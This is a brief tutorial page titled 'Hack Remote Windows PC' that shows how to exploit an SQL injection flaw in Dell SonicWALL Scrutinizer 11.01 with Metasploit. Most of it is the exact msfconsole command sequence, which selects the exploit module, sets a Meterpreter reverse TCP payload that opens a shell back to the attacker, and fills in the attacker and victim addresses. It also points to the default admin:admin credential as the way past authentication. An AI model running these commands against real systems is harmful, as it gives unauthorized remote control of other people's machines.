Hack Remote Windows PC Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection

Datetime:2016-08-23 00:15:34          Topic: SQL Injection           Share

This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail parameter in exporters.php allows an attacker to write arbitrary files to the file system with an SQL Injection attack, and gain remote code execution under the context of SYSTEM for Windows, or as Apache for Linux. Authentication is required to exploit this vulnerability, but this module uses the default admin:admin credential.

Exploit Targets

Dell SonicWALL Scrutinizer 11.01

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type  msfconsole

Now type  use exploit/ multi/http/sonicwall_scrutinizer_methoddetail_sqli

msf exploit( sonicwall_scrutinizer_methoddetail_sqli )> set payload windows/meterpreter/reverse_tcp

msf exploit( sonicwall_scrutinizer_methoddetail_sqli )> set lhost 192.168.0 . 108 (IP of Local Host)

msf exploit( sonicwall_scrutinizer_methoddetail_sqli )> set rhost 192.168.0.120

msf exploit ( sonicwall_scrutinizer_methoddetail_sqli )> exploit





About List